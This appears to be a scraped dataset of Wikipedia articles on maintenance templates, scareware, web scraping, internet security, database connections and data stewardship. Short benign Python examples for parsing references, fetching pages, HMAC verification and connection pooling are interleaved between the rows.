inaccuracies, so these templates can also draw attention to the need to add improved sources as soon as they become available. The template should generally be removed when the event described is no longer receiving massive editing attention. It is not meant to be a general disclaimer indicating that an article's contents may not be accurate, or to mark an article that merely has recent news articles about the topic (if it were, hundreds of thousands of articles would have the Current template, with no informational consequence). If the article continues to have sourcing or cleanup issues, a more appropriate maintenance template should be used instead. Linkrot , typically placed by the code Linkrot date August 2024 , and displaying when reading as: flags an article as having bare URLs, URLs that are used as references or external links without contextual information. 
These bare URLs are particularly vulnerable to link rot, as the record of the reference depends on the hosting website maintaining the current site structure, which is not guaranteed. A change in the underlying URL could make the reference unusable. The full citation format, on the other hand, preserves information (such as title and author) that can be used to restore a version of the reference that is still accessible. In addition, bare URLs can be less visually pleasing if the underlying URL is long. To address this issue, convert all bare URLs used as references to the appropriate citation template format. For bare URLs which are not used as references, use the following format: bare URL Descriptive text . Depending on the specific URL, it may be necessary to use an archiving service to restore an URL. More information is available at Repairing a dead link. As noted previously, most templates contain links to guidance pages. Additionally, many templates have documentation that provides more information about the template's flagged issue, which is displayed when you visit the template page itself. To access the template and thereby see its documentation, type into the search field Template:, followed by the name of the template, seen when you view its placement in the Edit interface (typically found in the first lines of the article). The first "parameter" is the name of the template. For example, if you found this in the Edit interface, Unreferenced date August 2024 , then you would visit the template itself by searching for Template:Unreferenced. The accompanying documentation for all maintenance templates, if it exists, can be located in this way. If you've read through this page and are still confused about what needs to be done to fix an issue on a page and remove a maintenance template, try asking at the Teahouse, a page designed for new users to ask questions. Alternatively, you could try the more general Help desk, or seek live assistance at the IRC channel: wikipedia-en-help. |
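The rows above describe <ref>...</ref> footnotes and the bare-URL problem flagged by Linkrot. Below is a minimal sketch of how such wikitext could be inspected with the regular-expression tooling already used in this notebook; the sample wikitext, the regex patterns, and the {{cite web}} field values are illustrative assumptions, not the markup of any particular article.
import re

# Illustrative wikitext fragment (hypothetical article text).
wikitext = (
    'Scraping is widely used.<ref name="intro">Mitchell, Web Scraping with Python.</ref> '
    'Prices change often.<ref>https://example.com/pricing</ref> '
    'The claim is repeated.<ref name="intro" />'
)

# Full <ref>...</ref> footnotes (named or unnamed), matched non-greedily.
full_refs = re.findall(r'<ref[^>/]*>(.*?)</ref>', wikitext, flags=re.DOTALL)

# Self-closing reuse of a named footnote, e.g. <ref name="intro" />.
reused_refs = re.findall(r'<ref\s+name="([^"]+)"\s*/>', wikitext)

# A "bare URL" reference is a footnote whose body is nothing but a URL;
# these are the ones the Linkrot template asks editors to expand.
bare_urls = [body for body in full_refs
             if re.fullmatch(r'https?://\S+', body.strip())]

print("footnote bodies:", full_refs)
print("reused names:   ", reused_refs)
print("bare URLs:      ", bare_urls)

# A hypothetical expansion of a bare URL into a fuller citation template.
for url in bare_urls:
    print('{{cite web |url=%s |title=TITLE GOES HERE |access-date=2024-08-01}}' % url)
Expanding a bare URL into a full citation preserves details such as the title and access date, which is exactly the information that survives if the underlying link later rots.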
95 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Scareware | Scareware is a form of malware which uses social engineering to cause shock, anxiety, or the perception of a threat in order to manipulate users into buying unwanted software 1 (or products). Scareware is part of a class of malicious software that includes rogue security software, ransomware and other scam software that tricks users into believing their computer is infected with a virus, then suggests that they download and pay for fake antivirus software to remove it. 2 Usually the virus is fictional and the software is non-functional or malware itself. 3 According to the Anti-Phishing Working Group, the number of scareware packages in circulation rose from 2,850 to 9,287 in the second half of 2008. 4 In the first half of 2009, the APWG identified a 585% increase in scareware programs. 5 The "scareware" label can also apply to any application or virus which pranks users with intent to cause anxiety or panic. Internet security writers use the term "scareware" to describe software products that produce frivolous and alarming warnings or threat notices, most typically for fictitious or useless commercial firewall and registry cleaner software. This class of program tries to increase its perceived value by bombarding the user with constant warning messages that do not increase its effectiveness in any way. Software is packaged with a look and feel that mimics legitimate security software in order to deceive consumers. 6 Some websites display pop-up advertisement windows or banners with text such as: "Your computer may be infected with harmful spyware programs. 7 Immediate removal may be required. To scan, click 'Yes' below." These websites can go as far as saying that a user's job, career, or marriage would be at risk. Products with advertisements such as these are often considered scareware. Serious scareware applications qualify as rogue software. Some scareware is not affiliated with any other installed programs. A user can encounter a pop-up on a website indicating that their PC is infected. 8 In some scenarios, it is possible to become infected with scareware even if the user attempts to cancel the notification. These popups are specially designed to look like they come from the user's operating system when they are actually a webpage. A 2010 study by Google found 11,000 domains hosting fake anti-virus software, accounting for 50% of all malware delivered via internet advertising. 9 Starting on March 29, 2011, more than 1.5 million web sites around the world were infected by the LizaMoon SQL injection attack spread by scareware. 10 11 Research by Google discovered that scareware was using some of its servers to check for internet connectivity. The data suggested that up to a million machines were infected with scareware. 12 The company has placed a warning in the search results for users whose computers appear to be infected. Another example of scareware is Smart Fortress. This site scares the victim into thinking they have many viruses on their computer and asks them to buy a professional service. 13 Some forms of spyware also qualify as scareware because they change the user's desktop background, install icons in the computer's notification area (under Microsoft Windows), and claim that some kind of spyware has infected the user's computer and that the scareware application will help to remove the infection.
In some cases, scareware trojans have replaced the desktop of the victim with large, yellow text reading "Warning! You have spyware!" or a box containing similar text, and have even forced the screensaver to change to "bugs" crawling across the screen. 14 Winwebsec is the term usually used to refer to the malware that attacks users of the Windows operating system and produces fake claims similar to those of genuine anti-malware software. 15 SpySheriff exemplifies spyware and scareware: it purports to remove spyware, but is actually a piece of spyware itself, often accompanying SmitFraud infections. 16 Other antispyware scareware may be promoted using a phishing scam. Another approach is to trick users into uninstalling legitimate antivirus software, such as Microsoft Security Essentials, or disabling their firewall. 17 Since antivirus programs typically include protection against being tampered with or disabled by other software, scareware may use social engineering to convince the user to disable programs which would otherwise prevent the malware from working. In 2005, Microsoft and Washington state successfully sued Secure Computer (makers of Spyware Cleaner) for $1 million over charges of using scareware pop-ups. 18 Washington's attorney general has also brought lawsuits against Securelink Networks, Softwareonline.com, 19 High Falls Media, and the makers of Quick Shield. 20 In October 2008, Microsoft and the Washington attorney general filed a lawsuit against two Texas firms, Branch Software and Alpha Red, producers of the Registry Cleaner XP scareware. 21 The lawsuit alleges that the company sent incessant pop-ups resembling system warnings to consumers' personal computers stating "CRITICAL ERROR MESSAGE - REGISTRY DAMAGED AND CORRUPTED", before instructing users to visit a web site to download Registry Cleaner XP at a cost of $39.95. On December 2, 2008, the U.S. Federal Trade Commission ("FTC") filed a Complaint in federal court against Innovative Marketing, Inc., ByteHosting Internet Services, LLC, as well as individuals Sam Jain, Daniel Sundin, James Reno, Marc D'Souza, and Kristy Ross. The Complaint also listed Maurice D'Souza as a Relief Defendant, alleging that he held proceeds of wrongful conduct but not accusing him of violating any law. The FTC alleged that the other Defendants violated the FTC Act by deceptively marketing software, including WinFixer, WinAntivirus, DriveCleaner, ErrorSafe, and XP Antivirus. According to the complaint, the Defendants falsely represented that scans of a consumer's computer showed that it had been compromised or infected and then offered to sell software to fix the alleged problems. 22 23 24 Another type of scareware involves software designed to literally scare the user through the use of unanticipated shocking images, sounds or video. Recent research has also introduced a new detection technology designed to identify scareware social engineering attacks with enhanced resilience. This approach targets the visual images presented to end users, which is a layer that attackers cannot easily obscure. 27 |
96 | https://en.wikipedia.org/wiki/Web_scraping | https://doi.org/10.1145%2F1281192.1281287 | Information systems; Information retrieval; Information storage systems. Web information is often presented in the form of record, e.g., a product record on a shopping website or a personal profile on a social utility website. Given a host webpage and related information needs, how to identify relevant records as well as ... We consider the problem of template-independent news extraction. The state-of-the-art news extraction method is based on template-level wrapper induction, which has two serious limitations. 1) It cannot correctly extract pages belonging to an unseen ... In this paper, we propose an adaptive wrapper generator that can generate adaptable wrapper for adapting networked information sources (NIS) format changes. When NIS's format changed, the adaptable wrapper can start recovery phase to discover the ... Yahoo!, USA; Cornell University, USA; University of Vermont, USA. Association for Computing Machinery, New York, NY, United States. |
97 | https://en.wikipedia.org/wiki/Web_scraping | https://cs.wikipedia.org/wiki/Web_scraping | Web scraping, web harvesting, or web data extraction refers to a way of obtaining structured data from web pages. It consists of extracting data located on web pages into a more useful format that can easily be processed further by machine. Although web scraping can be done manually, the term is more often used for automated harvesting carried out by web crawlers. Web harvesting is a form of downloading data from the web in which specific data are pulled from the web and stored in a database or spreadsheet so that they can be worked with later. Scraping a web page involves fetching it and extracting data from it. Fetching is the downloading of a page (which a browser performs when a user views the page); web crawling is therefore a central component of web scraping, used to obtain pages for later processing. Once a page has been fetched, extraction can follow: the page content may be parsed, searched, and reformatted, and its data copied into a spreadsheet or loaded into a database. Web scrapers typically take something out of a page in order to use it for another purpose elsewhere. Web scraping is used, for example, for contact scraping and as a component of applications used for web indexing, web mining, and web data extraction. It can be used for monitoring and comparing the online prices of specific products, obtaining product reviews (to watch the competition), gathering real-estate listings, tracking weather data, detecting changes to websites, research, monitoring online presence and reputation, web mashups, and web data integration. Very often, data are taken from the web so that some further action can be performed on them (automatically receiving an e-mail alert when something on a site changes, or automatically sending changed data to a company CRM); this is called web automation. It is used whenever the website of interest has no API, that is, it provides no way to download its data in structured form, or when its API does not expose all of the data or is simply too difficult to use. Typical cases where scraping data from the web is useful include situations where you need contact details from websites (contact scraping). Technically, this means finding and copying the names, telephone numbers, and e-mail addresses of people or companies, together with their URLs, into a list. Only data that are publicly available may be scraped, for example from company websites or public profiles on social networks. Other uses include monitoring competitors and the prices they charge for specific products: crawlers regularly download competitors' product price data or react to movements and changes in a given price. This use is common across markets, from e-commerce to the pharmaceutical business. Web scraping can also be used to reach new customers or to build an overview of a market from data on the web. Web pages are built with text-based markup languages (HTML and XHTML) and often contain a wealth of useful data in text form. Most web pages, however, are designed for end users, not for easy automated use. As a result, specialized tools and software have been developed to make scraping web pages easier. Newer forms of web scraping involve monitoring data feeds from web servers; JSON, for example, is commonly used as a transport mechanism for data between the client and the web server. There are methods that some websites use to prevent web scraping, such as detecting bots and disallowing them from crawling (browsing) their pages.
In response, there are web scraping systems that rely on DOM parsing, computer vision, and natural language processing to simulate human browsing, so that web page content can be gathered for offline parsing. Web scraping is the process of automatically mining data or gathering information from web pages. It is an area that is evolving and changing very quickly. It shares a common goal with the semantic web vision, an ambitious initiative that still requires breakthroughs in text processing, semantic understanding, artificial intelligence, and human-computer interaction. Current web scraping solutions range from ad-hoc solutions requiring human effort to fully automated systems capable of converting entire websites into structured information, albeit with certain limitations. The simplest form of web scraping is manually copying and pasting data from a web page into a text file or spreadsheet. Sometimes even the best web scraping technology cannot replace a human's manual examination and copy-and-paste into the target database, and sometimes this may be the only workable solution, for example when the websites to be scraped explicitly set up barriers to prevent machine automation. A simple yet powerful approach to extracting information from web pages can be based on the UNIX grep command or on the regular-expression matching facilities of programming languages (for example Perl or Python). Static and dynamic web pages can be retrieved by sending HTTP requests to a remote web server using socket programming. Many websites contain large numbers of pages generated dynamically from an underlying structured source such as a database. Data of the same category are usually encoded into similar pages by a common script or template. A program that detects such templates in a particular information source, extracts their content, and converts it into relational form is called a wrapper in data mining. Wrapper generation algorithms assume that the input pages of a wrapper induction system conform to a common template and that they can easily be identified in terms of a common URL scheme. In addition, some semi-structured data query languages, such as XQuery and the HTQL language 1, can be used to parse HTML pages and to retrieve and transform page content. By embedding a full-fledged web browser, such as Internet Explorer or the Mozilla Firefox browser control, programs can retrieve dynamic content generated by client-side scripts. These browser controls also parse web pages into a DOM tree, from which programs can retrieve parts of pages; languages such as XPath can be used to query the resulting DOM tree. Several companies have developed platforms for vertical aggregation. These platforms create and monitor a multitude of "bots" for specific verticals with no "human in the loop" (no direct human involvement) and no work related to a specific target site. The preparation involves building a knowledge base for the entire vertical, after which the platform creates the bots automatically. The platform's robustness is measured by the quality of the information it retrieves (usually the number of fields) and by its scalability (how quickly it can scale up to hundreds or thousands of sites). This scalability is mostly used to target long-tail sites that common aggregators consider complicated or too labor-intensive to harvest content from. Scraped pages may contain metadata or semantic markup and annotations that can be used to locate specific snippets of data. If the annotations are embedded in the pages, as Microformat does, this technique can be viewed as a special case of DOM parsing.
In another case, annotations organized into a semantic layer are stored and managed separately from the web pages, so scrapers can read the data schema and instructions from this layer before scraping the pages. There are also efforts using machine learning and computer vision that attempt to identify and extract information from web pages by interpreting pages visually, as a human might. This article uses a translation of the text of the article Web scraping on the English Wikipedia. |
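The (translated) article above describes the two halves of scraping: fetching a page over HTTP and then extracting data from its DOM. Below is a minimal sketch using the requests and BeautifulSoup libraries imported earlier in this notebook; the target URL and User-Agent string are placeholders, and any reachable page could be substituted.
import requests
from bs4 import BeautifulSoup

# Example only: any publicly reachable page could be used here.
url = "https://en.wikipedia.org/wiki/Web_scraping"

# Fetching: download the raw HTML, as a browser would.
response = requests.get(url, headers={"User-Agent": "simple-scraper-demo/0.1"}, timeout=15)
response.raise_for_status()

# Extraction: parse the document into a DOM-like tree and pull out structure.
soup = BeautifulSoup(response.text, "html5lib")
title = soup.find("h1")
paragraphs = [p.get_text(strip=True) for p in soup.find_all("p")]
links = [a["href"] for a in soup.find_all("a", href=True)]

print(title.get_text(strip=True) if title else "no <h1> found")
print(f"{len(paragraphs)} paragraphs, {len(links)} links")
For the XPath-style queries mentioned above, the lxml library could be used instead of (or underneath) BeautifulSoup; the fetching step stays the same.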
98 | https://en.wikipedia.org/wiki/Web_scraping | https://ary.wikipedia.org/wiki/%D8%AA%D8%BA%D8%B1%D8%A7%D9%81_%D9%84%D9%88%D9%8A%D8%A8 | (Web scraping), also referred to as data extraction. 1 |
99 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Internet_security | Internet security is a branch of computer security. It encompasses the Internet, browser security, web site security, 1 and network security as it applies to other applications or operating systems as a whole. Its objective is to establish rules and measures to use against attacks over the Internet. 2 The Internet is an inherently insecure channel for information exchange, with high risk of intrusion or fraud, such as phishing, 3 online viruses, trojans, ransomware and worms. Many methods are used to combat these threats, including encryption and ground-up engineering. 4 Malicious software comes in many forms, such as viruses, Trojan horses, spyware, and worms. A denial-of-service attack (DoS) or distributed denial-of-service attack (DDoS) is an attempt to make a computer resource unavailable to its intended users. It works by making so many service requests at once that the system is overwhelmed and becomes unable to process any of them. DoS may target cloud computing systems. 5 According to business participants in an international security survey, 25% of respondents experienced a DoS attack in 2007 and another 16.8% in 2010. citation needed DoS attacks often use bots (or a botnet) to carry out the attack. Phishing targets online users in an attempt to extract sensitive information such as passwords and financial information. 6 Phishing occurs when the attacker pretends to be a trustworthy entity, either via email or a web page. Victims are directed to web pages that appear to be legitimate, but instead route information to the attackers. Tactics such as email spoofing attempt to make emails appear to be from legitimate senders, or long complex URLs hide the actual website. 7 8 Insurance group RSA claimed that phishing accounted for worldwide losses of $10.8 billion in 2016. 9 A man-in-the-middle (MITM) attack is a type of cyber attack. Cybercriminals can intercept data sent between people to steal, eavesdrop or modify data for certain malicious purposes, such as extorting money and identity theft. Public WiFi is often insecure because monitoring or intercepting Web traffic is unknown. citation needed Applications used to access Internet resources may contain security vulnerabilities such as memory safety bugs or flawed authentication checks. Such bugs can give network attackers full control over the computer. 10 11 TCP IP protocols may be secured with cryptographic methods and security protocols. These protocols include Secure Sockets Layer (SSL), succeeded by Transport Layer Security (TLS) for web traffic, Pretty Good Privacy (PGP) for email, and IPsec for network layer security. 12 IPsec is designed to protect TCP IP communication in a secure manner. It is a set of security extensions developed by the Internet Engineering Task Force (IETF). It provides security and authentication at the IP layer by transforming data using encryption. Two main types of transformation form the basis of IPsec: the Authentication Header (AH) and ESP. They provide data integrity, data origin authentication, and anti-replay services. These protocols can be used alone or in combination. Basic components include: The algorithm allows these sets to work independently without affecting other parts of the implementation. The IPsec implementation is operated in a host or security gateway environment giving protection to IP traffic. 
Threat Modeling tools helps you to proactively analyze the cyber security posture of a system or system of systems and in that way prevent security threats. Multi-factor authentication (MFA) is an access control method in which a user is granted access only after successfully presenting separate pieces of evidence to an authentication mechanism two or more from the following categories: knowledge (something they know), possession (something they have), and inference (something they are). 13 14 Internet resources, such as websites and email, may be secured using this technique. Some online sites offer customers the ability to use a six-digit code which randomly changes every 30 60 seconds on a physical security token. The token has built-in computations and manipulates numbers based on the current time. This means that every thirty seconds only a certain array of numbers validate access. The website is made aware of that device's serial number and knows the computation and correct time to verify the number. After 30 60 seconds the device presents a new random six-digit number to log into the website. 15 Email messages are composed, delivered, and stored in a multiple step process, which starts with the message's composition. When a message is sent, it is transformed into a standard format according to RFC 2822. 16 Using a network connection, the mail client sends the sender's identity, the recipient list and the message content to the server. Once the server receives this information, it forwards the message to the recipients. Pretty Good Privacy provides confidentiality by encrypting messages to be transmitted or data files to be stored using an encryption algorithm such as Triple DES or CAST 128. Email messages can be protected by using cryptography in various ways, such as the following: The first two methods, message signing and message body encryption, are often used together; however, encrypting the transmissions between mail servers is typically used only when two organizations want to protect emails regularly sent between them. For example, the organizations could establish a virtual private network (VPN) to encrypt communications between their mail servers. 17 Unlike methods that only encrypt a message body, a VPN can encrypt all communication over the connection, including email header information such as senders, recipients, and subjects. However, a VPN does not provide a message signing mechanism, nor can it provide protection for email messages along the entire route from sender to recipient. A Message authentication code (MAC) is a cryptography method that uses a secret key to digitally sign a message. This method outputs a MAC value that can be decrypted by the receiver, using the same secret key used by the sender. The Message Authentication Code protects both a message's data integrity as well as its authenticity. 18 A computer firewall controls access to a single computer. A network firewall controls access to an entire network. A firewall is a security device — computer hardware or software — that filters traffic and blocks outsiders. It generally consists of gateways and filters. Firewalls can also screen network traffic and block traffic deemed unauthorized. Firewalls restrict incoming and outgoing network packets. Only authorized traffic is allowed to pass through it. Firewalls create checkpoints between networks and computers. Firewalls can block traffic based on IP source and TCP port number. They can also serve as the platform for IPsec. 
Using tunnel mode, firewalls can implement VPNs. Firewalls can also limit network exposure by hiding the internal network from the public Internet. A packet filter processes network traffic on a packet-by-packet basis. Its main job is to filter traffic from a remote IP host, so a router is needed to connect the internal network to the Internet. The router is known as a screening router, which screens packets leaving and entering the network. In a stateful firewall the circuit-level gateway is a proxy server that operates at the network level of an Open Systems Interconnect (OSI) model and statically defines what traffic will be allowed. Circuit proxies forward network packets (formatted data) containing a given port number, if the port is permitted by the algorithm. The main advantage of a proxy server is its ability to provide Network Address Translation (NAT), which can hide the user's IP address from the Internet, effectively protecting internal information from the outside. An application-level firewall is a third-generation firewall where a proxy server operates at the very top of the OSI model, the IP suite application level. A network packet is forwarded only if a connection is established using a known protocol. Application-level gateways are notable for analyzing entire messages rather than individual packets. Web browser market share predicts the share of hacker attacks. For example, Internet Explorer 6, which used to lead the market, 19 was heavily attacked. 20 Antivirus software can protect a programmable device by detecting and eliminating malware. 21 A variety of techniques are used, such as signature-based, heuristics, rootkit, and real-time. A password manager is a software application that creates, stores and provides passwords to applications. Password managers encrypt passwords. The user only needs to remember a single master password to access the store. 22 Security suites were first offered for sale in 2003 (McAfee) and contain firewalls, anti-virus, anti-spyware and other components. 23 They also offer theft protection, portable storage device safety check, private Internet browsing, cloud anti-spam, a file shredder or make security-related decisions (answering popup windows) and several were free of charge. 24 A promising technology with low production and installation costs, unattended network operation, and autonomous longtime operation. According to research, building a secure Internet of Things (IoT) should start with securing WSNs ahead of other components. 25 At the National Association of Mutual Savings Banks (NAMSB) conference in January 1976, Atalla Corporation (founded by Mohamed Atalla) and Bunker Ramo Corporation (founded by George Bunker and Simon Ramo) introduced the earliest products designed for dealing with online security. Atalla later added its Identikey hardware security module, and supported processing online transactions and network security. Designed to process bank transactions online, the Identikey system was extended to shared-facility operations. It was compatible with various switching networks, and was capable of resetting itself electronically to any one of 64,000 irreversible nonlinear algorithms as directed by card data information. 26 In 1979, Atalla introduced the first network security processor (NSP). 27 |
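The Internet security row above mentions message authentication codes (MACs) computed with a shared secret key. In practice a MAC such as HMAC is recomputed by the receiver and compared rather than decrypted; below is a minimal sketch using Python's standard hmac and hashlib modules, with a placeholder key and message.
import hmac
import hashlib

# Shared secret key known to both sender and receiver (placeholder value).
secret_key = b"a-shared-secret-key"
message = b"Transfer 100 USD to account 12345"

# Sender computes the MAC tag over the message with the shared key.
tag = hmac.new(secret_key, message, hashlib.sha256).hexdigest()

def verify(key: bytes, msg: bytes, received_tag: str) -> bool:
    # Receiver recomputes the MAC and compares it to the received tag.
    expected = hmac.new(key, msg, hashlib.sha256).hexdigest()
    return hmac.compare_digest(expected, received_tag)

print(verify(secret_key, message, tag))                                  # True: authentic and unmodified
print(verify(secret_key, b"Transfer 900 USD to account 12345", tag))     # False: message was tampered with
hmac.compare_digest performs a constant-time comparison, which avoids leaking information through timing differences during verification.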
100 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Database_connection | A database connection is a facility in computer science that allows client software to talk to database server software, whether on the same machine or not. A connection is required to send commands and receive answers, usually in the form of a result set. Connections are a key concept in data-centric programming. Since some DBMS engines require considerable time to connect, connection pooling was invented to improve performance. No command can be performed against a database without an "open and available" connection to it. Connections are built by supplying an underlying driver or provider with a connection string, which is a way of addressing a specific database or server and instance as well as user authentication credentials (for example, Server sql box;Database Common;User ID uid;Pwd password;). Once a connection has been built it can be opened and closed at will, and properties (such as the command time-out length, or transaction, if one exists) can be set. The Connection String is composed of a set of key value pairs as dictated by the data access interface and data provider being used. Many databases (such as PostgreSQL) only allow one operation to be performed at a time on each connection. If a request for data (a SQL Select statement) is sent to the database and a result set is returned, the connection is open but not available for other operations until the client finishes consuming the result set. Other databases, like SQL Server 2005 (and later), do not impose this limitation. However, databases that provide multiple operations per connection usually incur far more overhead than those that permit only a single operation task at a time. Database connections are finite and expensive and can take a disproportionately long time to create relative to the operations performed on them. It is inefficient for an application to create, use, and close a database connection whenever it needs to update a database. Connection pooling is a technique designed to alleviate this problem. A pool of database connections can be created and then shared among the applications that need to access the database. The connection object obtained from the connection pool is often a wrapper around the actual database connection. The wrapper understands its relationship with the pool, and hides the details of the pool from the application. For example, the wrapper object can implement a "close" method that can be called just like the "close" method on the database connection. Unlike the method on the database connection, the method on the wrapper may not actually close the database connection, but instead return it to the pool. The application need not be aware of the connection pooling when it calls the methods on the wrapper object. This approach encourages the practice of opening a connection in an application only when needed, and closing it as soon as the work is done, rather than holding a connection open for the entire life of the application. In this manner, a relatively small number of connections can service a large number of requests. This is also called multiplexing. In a client server architecture, on the other hand, a persistent connection is typically used so that server state can be managed. This "state" includes server-side cursors, temporary products, connection-specific functional settings, and so on. An application failure occurs when the connection pool overflows. 
This can occur if all of the connections in the pool are in use when an application requests a connection. For example, the application may use a connection for too long when too many clients attempt to access the web site or one or more operations are blocked or simply inefficient. |
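Row 100 above describes connection strings and connection pooling, including a wrapper object whose close() returns the underlying connection to the pool instead of closing it. Below is a minimal sketch of that idea using Python's built-in sqlite3 and queue modules; the pool size and the in-memory database are illustrative choices, and the key=value connection-string format mentioned in the row (conventionally written as Server=sql_box;Database=Common;User ID=uid;Pwd=password;) is driver-specific and shown only as an assumption.
import sqlite3
import queue

class PooledConnection:
    """Wrapper whose close() hands the real connection back to the pool."""
    def __init__(self, conn, pool):
        self._conn = conn
        self._pool = pool

    def execute(self, sql, params=()):
        return self._conn.execute(sql, params)

    def close(self):
        # Return the underlying connection to the pool for reuse
        # instead of actually closing it.
        self._pool.release(self._conn)

class ConnectionPool:
    def __init__(self, database, size=3):
        self._free = queue.Queue()
        for _ in range(size):
            # check_same_thread=False keeps the sketch simple; a real pool
            # would manage thread affinity and connection health explicitly.
            self._free.put(sqlite3.connect(database, check_same_thread=False))

    def acquire(self, timeout=5):
        # Raises queue.Empty if no connection becomes free in time
        # (the "pool overflow" failure described above).
        return PooledConnection(self._free.get(timeout=timeout), self)

    def release(self, conn):
        self._free.put(conn)

pool = ConnectionPool(":memory:", size=2)
conn = pool.acquire()
conn.execute("CREATE TABLE IF NOT EXISTS t (x INTEGER)")
conn.close()   # returns the connection to the pool rather than closing it
If acquire() is called while every pooled connection is in use and the timeout elapses, queue.Empty is raised, which corresponds to the overflow failure the row describes.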
101 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Special:EditPage/Template:Data | (No article content: Wikipedia returned a "You do not have permission to edit this page" notice because the requesting IP range 180.190.0.0/16 is blocked.) |
102 | https://en.wikipedia.org/wiki/Data_scraping | https://en.wikipedia.org/wiki/Data_steward | A data steward is an oversight or data governance role within an organization, and is responsible for ensuring the quality and fitness for purpose of the organization's data assets, including the metadata for those data assets. A data steward may share some responsibilities with a data custodian, such as the awareness, accessibility, release, appropriate use, security and management of data. 1 A data steward would also participate in the development and implementation of data assets. A data steward may seek to improve the quality and fitness for purpose of other data assets their organization depends upon but is not responsible for. Data stewards have a specialist role that utilizes an organization's data governance processes, policies, guidelines and responsibilities for administering an organizations' entire data in compliance with policy and or regulatory obligations. The overall objective of a data steward is the data quality of the data assets, datasets, data records and data elements. 1 2 This includes documenting metainformation for the data, such as definitions, related rules governance, physical manifestation, and related data models (most of these properties being specific to an attribute concept relationship), identifying owners custodian's various responsibilities, relations insight definition needed pertaining to attribute quality, aiding with project requirement data facilitation and documentation of capture rules. Data stewards begin the stewarding process with the identification of the data assets and elements which they will steward, with the ultimate result being standards, controls and data entry. citation needed The steward works closely with business glossary standards analysts (for standards), with data architect modelers (for standards), with DQ analysts (for controls) and with operations team members (good-quality data going in per business rules) while entering data. Data stewardship roles are common when organizations attempt to exchange data precisely and consistently between computer systems and to reuse data-related resources. citation needed Master data management often quantify makes references to the need for data stewardship for its implementation to succeed. Data stewardship must have precise purpose, fit for purpose or fitness. A data steward ensures that each assigned data element: Responsibilities of data stewards vary between different organisations and institutions. For example, at Delft University of Technology, data stewards are perceived as the first contact point for any questions related to research data. They also have subject-specific background allowing them to easily connect with researchers and to contextualise data management problems to take into account disciplinary practices. 3 Depending on the set of data stewardship responsibilities assigned to an individual, there are 4 types (or dimensions of responsibility) of data stewards typically found within an organization: Systematic data stewardship can foster: Assignment of each data element to a person sometimes seems like an unimportant process. But many groups which? have found that users have greater trust and usage rates in systems where they can contact a person with questions on each data element. Delft University of Technology (TU Delft) offers an example of data stewardship implementation at a research institution. 
In 2017 the Data Stewardship Project was initiated at TU Delft to address research data management needs in a disciplinary manner across the whole campus. 5 Dedicated data stewards with subject-specific background were appointed at every TU Delft faculty to support researchers with data management questions and to act as a linking point with the other institutional support services. The project is coordinated centrally by TU Delft Library, and it has its own website, 6 blog 7 and a YouTube channel. 8 The 1 EPA metadata registry furnishes an example of data stewardship. Note that each data element therein has a "POC" (point of contact). In 2023, ETH Zurich launched the Data Stewardship Network (DSN) to facilitate collaboration among employees engaged in data management, analysis, and code development across research groups. The DSN serves as a platform for networking and knowledge exchange, aiming to professionalize the role of data stewards who support research data management and reproducible workflows. Established by the team for Research Data Management and Digital Curation at the ETH Library, the DSN collaborates with Scientific IT Services to provide expertise in areas such as storage infrastructure and reproducible workflows. 9 A new market for data governance applications is emerging, one in which both technical and business staff — stewards — manage policies. These new applications, like previous generations, deliver a strong business glossary capability, but they do not stop there. Vendors are introducing additional features addressing the roles of business in addition to technical stewards' concerns. 10 Information stewardship applications are business solutions used by business users acting in the role of information steward (interpreting and enforcing information governance policy, for example). These developing solutions represent, for the most part, an amalgam of a number of disparate, previously IT-centric tools already on the market, but are organized and presented in such a way that information stewards (a business role) can support the work of information policy enforcement as part of their normal, business-centric, day-to-day work in a range of use cases. The initial push for the formation of this new category of packaged software came from operational use cases — that is, use of business data in and between transactional and operational business applications. This is where most of the master data management efforts are undertaken in organizations. However, there is also now a faster-growing interest in the new data lake arena for more analytical use cases. 11 Some of the vendors in Metadata Management, like Alation, have started highlighting the importance of Data Stewards to employees interested in using data to make business decisions. 12 |
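The data steward rows above describe assigning each data element a definition, governance rules, and a named point of contact (POC). Below is a minimal sketch of such a registry as a Python data structure; the field names and the example element are hypothetical and not taken from the EPA registry or the TU Delft setup mentioned above.
from dataclasses import dataclass, field

@dataclass
class DataElement:
    """Illustrative record of the metadata a data steward might maintain."""
    name: str
    definition: str
    steward: str                              # point of contact (POC) for questions
    governance_rules: list = field(default_factory=list)
    source_system: str = ""

registry = {
    "customer_email": DataElement(
        name="customer_email",
        definition="Primary email address supplied by the customer at signup.",
        steward="jane.doe@example.org",
        governance_rules=["must be validated on entry", "PII: restricted access"],
        source_system="CRM",
    ),
}

def point_of_contact(element_name: str) -> str:
    """Return the steward to contact about a given data element."""
    return registry[element_name].steward

print(point_of_contact("customer_email"))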
103 | https://en.wikipedia.org/wiki/Web_scraping | https://zh-yue.wikipedia.org/wiki/%E7%B6%B2%E9%A0%81%E5%88%AE%E6%96%99 | mong5 jip6 gwaat3 liu2 (web scraping), HTTP. |
104 | https://en.wikipedia.org/wiki/Web_scraping | https://ca.wikipedia.org/wiki/Web_scraping | Web scraping (from the English to scrape) is a software technique for extracting information from websites. In general, these programs simulate human exploration of the World Wide Web, either through a low-level implementation of the Hypertext Transfer Protocol (HTTP) or by embedding a web browser such as Internet Explorer 1 or Mozilla Firefox. 2 Web scraping is closely related to web indexing, which indexes information from the web using a bot; that technique is universal and has been adopted by most search engines. By contrast, web scraping focuses more on transforming unstructured data on the web, usually in HTML format, into structured data that can be stored and analyzed in a local or central database or in a spreadsheet. Web scraping is also related to web automation, which simulates human browsing using computer software. Some of the main uses of web scraping are comparing prices in shops, monitoring weather-related data for a region, detecting changes on websites, and integrating data into websites. Web scraping is the process of automatically collecting information from the web. It is a field with active development that shares a common purpose with the semantic web vision and uses practical solutions based on existing technologies. There are different levels of automation that existing web scraping technologies can offer: Web scraping may go against the terms of use of some websites. The enforceability of these terms is not entirely clear. While outright duplication of original expression may in many cases be illegal, in the United States the court ruled in Feist Publications v. Rural Telephone Service that duplication of facts is permitted. United States courts have on occasion recognized that certain uses of scrapers should not be permitted. A computer may be considered personal property, in which case the scraper would be trespassing on that property. In the best-known case, eBay v. Bidder's Edge, the latter company had to stop making automated requests to eBay's site; in that case, Bidder's Edge was automatically bidding on certain products on the site. One of the main court battles over scraping involved American Airlines and a company called FareChase. American Airlines won that battle, 